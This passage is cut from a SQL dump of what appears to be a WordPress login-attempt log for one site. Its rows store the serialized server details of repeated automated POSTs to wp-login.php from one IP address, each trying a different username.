";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060678.0801239;s:12:\"REQUEST_TIME\";i:1747060678;}}','13.127.208.15',1,'2025-05-12 20:07:59','2025-05-13 20:21:04'),(95736,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061064.009403;s:12:\"REQUEST_TIME\";i:1747061064;}}','13.127.208.15',1,'2025-05-12 20:14:26','2025-05-13 20:21:05'),(95737,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061065.8258131;s:12:\"REQUEST_TIME\";i:1747061065;}}','13.127.208.15',1,'2025-05-12 20:14:27','2025-05-13 20:21:04'),(95738,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061065.8251519;s:12:\"REQUEST_TIME\";i:1747061065;}}','13.127.208.15',1,'2025-05-12 20:14:27','2025-05-13 20:21:05'),(95739,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061064.012234;s:12:\"REQUEST_TIME\";i:1747061064;}}','13.127.208.15',1,'2025-05-12 20:14:32','2025-05-13 20:21:04'),(95740,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061064.0099571;s:12:\"REQUEST_TIME\";i:1747061064;}}','13.127.208.15',1,'2025-05-12 20:14:32','2025-05-13 20:21:04'),(95741,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"127\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"127\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061462.2742779;s:12:\"REQUEST_TIME\";i:1747061462;}}','13.127.208.15',1,'2025-05-12 20:21:04','2025-05-13 20:21:04'),(95742,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061462.272958;s:12:\"REQUEST_TIME\";i:1747061462;}}','13.127.208.15',1,'2025-05-12 20:21:04','2025-05-13 20:21:04'),(95743,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061462.2723601;s:12:\"REQUEST_TIME\";i:1747061462;}}','13.127.208.15',1,'2025-05-12 20:21:04','2025-05-13 20:21:04'),(95744,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"134\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"134\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061464.074564;s:12:\"REQUEST_TIME\";i:1747061464;}}','13.127.208.15',1,'2025-05-12 20:21:05','2025-05-13 20:21:05'),(95745,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"130\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"130\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747061464.073966;s:12:\"REQUEST_TIME\";i:1747061464;}}','13.127.208.15',1,'2025-05-12 20:21:05','2025-05-13 20:21:05'),(95746,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64780\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/